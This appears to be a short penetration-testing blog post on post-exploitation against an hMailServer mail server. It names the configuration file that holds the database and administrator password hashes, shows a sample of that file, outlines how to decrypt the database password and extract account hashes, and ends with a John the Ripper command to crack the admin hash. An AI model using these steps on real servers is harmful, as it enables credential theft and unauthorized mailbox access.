As part of any post exploitation in a security auditing or testing engagement you will want to gather as much info as you want about the victim to be able to target your next victim in the chain.
Having said that sometimes you stumble upon strange files, encrypted data, and network traffic that you don’t know what to do with it. One of these was an .sdf file related to hmailserver. The last is an open source mail server, you can read more about it here.
When gaining access to this server you will want to read this file:
|
1 |
C:\Program Files\hMailServer\Bin\hMailServer.ini |
A sample output would look something like this:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
[Directories] ProgramFolder=C:\Program Files\hMailServer DatabaseFolder=C:\Program Files\hMailServer\Database DataFolder=C:\Program Files\hMailServer\Data LogFolder=C:\Program Files\hMailServer\Logs [GUILanguages] ValidLanguages=english [Database] Type=MSSQLCE Username= Password=76A2173BE6393254E72FFA4D6DF1030A PasswordEncryption=1 Port=0 Server= Database=hMailServer Internal=1 [Security] AdministratorPassword=5F4DCC3B5AA765D61D8327DEB882CF99 |
- Copy the SQL server database hash, we will get back to that in a bit
- You have the admin password hash for the hMailAdmin.exe (an application that allows you to manage the mail server)
hMailServer is generous enough to offer us a bin tool to decrypt the SQL server hash for us if you know the admin password.
Read this article, STEP1 to know how to decrypt the sql password.
Once the SQL server password is in your pocket, you can now read the sdf file and get the accounts hashes. These steps were the easy part for me, I struggled A LOT with opening the .sdf file. Luckily I found a tool called SQL Compact Query Analyzer; which will do the job!
Happy hacking
//AK
legal note: I’m not responsible how you use these techniques, I presented them assuming you’re legally using them.
john –wordlist=/root/password/rockyou.txt /temp/pass.txt –format=Raw-MD5
to crack admin hash